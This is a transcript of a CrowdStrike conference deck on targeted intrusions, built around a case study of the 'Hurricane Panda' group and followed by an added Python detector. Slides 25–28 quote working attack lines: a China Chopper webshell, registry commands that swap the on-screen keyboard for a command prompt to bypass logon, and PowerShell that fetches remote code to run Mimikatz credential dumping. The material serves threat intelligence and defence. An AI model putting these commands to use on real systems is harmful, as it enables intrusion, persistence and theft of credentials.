HAND-TO-HAND COMBAT WITH A TARGETED ATTACKER GEORGE KURTZ, CEO & CO-FOUNDER THE GAP OF SECURITY

Upload: ngoduong

Post on 08-Jun-2018


TRANSCRIPT

Page 1

HAND-TO-HAND COMBAT WITH A TARGETED ATTACKER

GEORGE KURTZ, CEO & CO-FOUNDER

THE GAP OF SECURITY

Page 2

A Little About Me…

2014 CrowdStrike, Inc. All rights reserved.

GEORGE KURTZ | PRESIDENT/CEO & CO-FOUNDER, CrowdStrike

Serial Entrepreneur: author, entrepreneur, and speaker with 23 years in the security space

Prior to CrowdStrike: WW CTO and GM, as well as SVP of Enterprise at McAfee. Founder & CEO of Foundstone (acquired by McAfee in 2004)

www.hackingexposed7.com | @George_Kurtz

Page 3

WHO IS CROWDSTRIKE?

CrowdStrike is a pioneer in next-generation endpoint protection, threat intelligence, and pre/post response services

Trusted by some of the largest blue chip companies and three out of four of the top government agencies in the world

Led by security experts and industry veterans with over 200 years of relevant experience

Founded 2011

Page 4

AGENDA

• Current State of In-Security
• CASE STUDY: Who is Hurricane Panda?
• Take-aways

Page 5

69%

Page 6

200+ Days

Page 7

$7.6M

Page 8

$214

Page 9

40%

Page 10

WHY IS THIS HAPPENING - THE GAP

[Chart. Horizontal axis: THREAT SOPHISTICATION, running from OPPORTUNISTIC ACTORS to DETERMINED ACTORS. Vertical axes: CAPABILITY FOR DAMAGE and ABILITY TO PREVENT. Actor categories plotted: Terrorists, Cybercriminals, Commercial Enterprises, Hacktivists/Vigilantes, Nation-States. The 40% difference between the two curves at the determined end is labelled THE GAP.]

Page 11

TODAY’S HEADLINES

Page 12

REAL FINANCIAL IMPACT OF IP THEFT

Page 13

Nearly $1B loss in market cap overnight from a targeted attack!

Page 14

WHAT ORGANIZATIONS CAN DO TODAY

Destroy & Dump - The New Reality

Page 15

MAGINOT LINE IS NOT WORKING

Page 16

DEFENSE IN DEPTH IS SILENTLY FAILING AGAINST DETERMINED ADVERSARIES

[Chart: the defensive layers ENDPOINT, NETWORK and WEB/MAIL, each rated against the two attack classes, Opportunistic and Targeted.]

Page 17

ORGANIZATIONS BELIEVE THEY HAVE A MALWARE PROBLEM

Page 18

ORGANIZATIONS BELIEVE THEY HAVE A MALWARE PROBLEM. THEY HAVE AN ADVERSARY PROBLEM.

Page 19

ADVANCED ATTACKERS EVADE traditional defenses and destroy today’s networks

Page 20

Understanding the “Who” behind these attacks

CHINA
• Comment Panda: Commercial, Government, Non-profit
• Deep Panda: Financial, Technology, Non-profit
• Foxy Panda: Technology & Communications
• Anchor Panda: Government organizations, Defense & Aerospace, Industrial Engineering, NGOs
• Hurricane Panda: Telecommunications Sector
• Impersonating Panda: Financial Sector
• Karma Panda: Dissident groups
• Keyhole Panda: Electronics & Communications
• Poisonous Panda: Energy Technology, G20, NGOs, Dissident Groups
• Putter Panda: Governmental & Military
• Toxic Panda: Dissident Groups
• Union Panda: Industrial companies
• Vixen Panda: Government

IRAN
• Magic Kitten: Dissidents
• Cutting Kitten: Energy Companies

INDIA
• Viceroy Tiger: Government, Legal, Financial, Media, Telecom

RUSSIA
• Energetic Bear: Oil and Gas Companies

NORTH KOREA
• Silent Chollima: Government, Military, Financial

CRIMINAL
• Singing Spider: Commercial, Financial
• Union Spider: Manufacturing
• Andromeda Spider: Numerous

HACKTIVIST/TERRORIST
• Deadeye Jackal: Commercial, Financial, Media, Social Networking
• Ghost Jackal: Commercial, Energy, Financial
• Corsair Jackal: Commercial, Technology, Financial, Energy
• Extreme Jackal: Military, Government

Page 21

WHEN PANDAS ATTACK… MALWARE FREE INTRUSIONS

Page 22

WHO IS HURRICANE PANDA?

Operational Window: Late 2013 – Present
Targeting: Telecommunications & Technology
Objectives: Recon, Lateral Movement, IP Theft
Locations: United States, Japan
Tools: Chopper Webshell, PlugX, HiKit

Capabilities:
• Theft of Signing Certificates: used to sign malware to help evade detection
• Remote Access Tools: use of malware and webshells for remote access
• Escalation: privileges and lateral movement with credential dumping tools
• Exfil: usage of FTP to send data out of an organization

Page 23

THE ATTACK…

Page 24

ADVERSARY ACTIVITIES REMAINED UNDETECTED FOR OVER ONE YEAR.

Page 25

GAIN ACCESS | MAINTAIN PERSISTENCE | DUMP CREDENTIALS

Chopper webshell:

<%@Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

SECURITY CHALLENGE: DETECTING & STOPPING A 72 BYTE BACKDOOR WRITTEN TO A WEBSERVER USING AN ARBITRARY FILE WRITE

Page 26

GAIN ACCESS | MAINTAIN PERSISTENCE | DUMP CREDENTIALS

Registry command for the debugger hack (if done locally):

reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f

Registry command for the debugger hack (if done remotely using WMI):

wmic /user:<REDACTED> /password:<REDACTED> /node:<REDACTED> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"

SECURITY CHALLENGE: DETECTING PERSISTENCE THAT DOESN’T RELY ON A BINARY EXECUTABLE & BYPASSES THE LOGIN PROCESS

Page 27

STICKY KEYS IN ACTION

BEFORE LOGGING IN THE ATTACKER HAS FULL SYSTEM PRIVILEGES WITH A COMMAND PROMPT WINDOW

Page 28

GAIN ACCESS | MAINTAIN PERSISTENCE | DUMP CREDENTIALS

Using base64-encoded commands in PowerShell:

powershell -windowStyle hidden -ExecutionPolicy ByPass -encodedCommand
DQAKAA0ACgBwAG8AdwBlAHIAcwBoAGUAbABsACAAIgBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMA
dAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4A
ZwAoACcAaAB0AHQAcAA6AC8ALwBpAHMALgBnAGQALwBvAGUAbwBGAHUASQAnACkAOwAgAEkAbgB2AG8A
awBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAiACAAPgAgAEMAOgBcAHUA
cwBlAHIAcwBcAGEALgB0AHgAdAANAAoAIAAgACAAIAANAAoA

Real commands evading traditional defenses:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://<REDACTED>'); Invoke-Mimikatz -DumpCreds" > C:\users\a.txt

SECURITY CHALLENGE: DETECTING PRIVILEGE ESCALATION & LATERAL MOVEMENT THAT RELIES ON MEMORY-BACKED FILES

Page 29

INDICATORS OF COMPROMISE VS. INDICATORS OF ATTACK - TRANSFORMATIONAL

Need to look out the windshield – not drive in the rear view mirror

REACTIVE INDICATORS OF COMPROMISE vs PROACTIVE INDICATORS OF ATTACK

IOCs: Malware, Signatures, Exploits, Vulnerabilities, IP Addresses

IOAs: Code Execution, Persistence, Stealth, Command & Control, Lateral Movement
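The two techniques on slides 26 and 28 (the IFEO "Debugger" write that bypasses logon, and the hidden, encoded PowerShell that stages a credential dumper in memory) leave no file to hash, which is exactly why this slide argues for indicators of attack. The Python below is an added example, not code from the deck or from CrowdStrike: it decodes -encodedCommand arguments and flags those two behaviours over constructed process-creation command lines. The placeholder URL, the benign records and the inclusion of sethc.exe (the Sticky Keys binary, not named on the slide) are assumptions.

```python
import base64
import re

# Behavioural indicators modelled on slides 26 and 28 (constructed example, not CrowdStrike code).
IFEO_PATH = "image file execution options"
# osk.exe is the binary on the slide; sethc.exe is the Sticky Keys binary the slide title refers to.
ACCESSIBILITY_BINS = ("osk.exe", "sethc.exe")
CRED_THEFT_MARKERS = ("invoke-mimikatz", "-dumpcreds", "downloadstring")
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the plaintext behind a PowerShell -encodedCommand argument, or None.
    PowerShell expects base64 of UTF-16LE text, hence the many 'A's in the slide 28 blob."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def indicators_of_attack(cmdline):
    """Map one process command line to the IOA labels it triggers ([] means nothing seen)."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline.lower() + (" " + decoded.lower() if decoded else "")
    hits = []
    # Slide 26: a Debugger value under IFEO for an accessibility binary is login-bypass persistence,
    # whether written by reg.exe locally or through 'wmic ... process call create'.
    if IFEO_PATH in text and "debugger" in text and any(b in text for b in ACCESSIBILITY_BINS):
        hits.append("ifeo-accessibility-debugger")
    # Slide 28: hidden, encoded PowerShell that stages a credential dumper straight into memory.
    if decoded is not None:
        hits.append("encoded-powershell")
    if any(marker in text for marker in CRED_THEFT_MARKERS):
        hits.append("credential-theft-tooling")
    return hits

def sample_commandlines():
    """Constructed records modelled on the deck's commands; the URL is a placeholder."""
    staged = ("powershell \"IEX (New-Object Net.WebClient).DownloadString("
              "'http://placeholder.invalid/x'); Invoke-Mimikatz -DumpCreds\" > C:\\users\\a.txt")
    encoded = base64.b64encode(staged.encode("utf-16-le")).decode("ascii")
    ifeo = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
    return [
        f'reg.exe add "{ifeo}\\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f',
        "powershell -windowStyle hidden -ExecutionPolicy ByPass -encodedCommand " + encoded,
        f'reg.exe add "{ifeo}\\notepad.exe" /v "GlobalFlag" /t REG_DWORD /d 0x200 /f',  # benign
        "powershell -ExecutionPolicy ByPass -File C:\\scripts\\inventory.ps1",
    ]
```

Run over a real Sysmon or EDR process-creation feed, the same two checks fire on the slide's commands whether or not the attacker ever drops a binary, which is the point of looking at behaviour instead of hashes.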

Page 30

SECURITY TEAMS MUST ADJUST & GO REAL-TIME

New Detection Methods:

• Must be real-time or near real-time
• Sweeping just for IOCs is a losing proposition
• Must detect credential theft as it happens
• Manage privileged accounts
• 24x7 Managed Services to aid in detection & containment

REMEMBER: What happens in a virtual container is NOT what happens on your endpoints

Page 31

“If you no longer go for a gap that exists, you are no longer a racing driver because we are competing, we are competing to win”
– Ayrton Senna, F1 Driver & Champion

“If you no longer go for a gap that exists in your victim, you are no longer a true adversary”
– Bad Guy Inc.

Page 32

Questions?

[email protected]